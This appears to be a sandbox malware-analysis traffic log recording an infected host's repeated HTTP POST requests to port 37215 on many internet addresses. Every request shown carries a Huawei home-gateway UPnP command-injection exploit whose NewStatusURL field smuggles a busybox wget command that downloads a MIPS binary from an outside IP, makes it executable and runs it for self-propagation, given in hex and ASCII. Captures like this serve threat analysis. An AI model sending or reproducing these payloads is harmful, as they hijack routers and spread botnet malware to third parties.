2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2231192.168.2.1350870157.100.28.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742223024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.034725904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522645950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2232192.168.2.1341016157.213.226.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742621899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042684078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522663116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2233192.168.2.134898441.234.160.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742630959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042684078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522663116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2234192.168.2.1354492197.238.209.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.742680073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042696953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
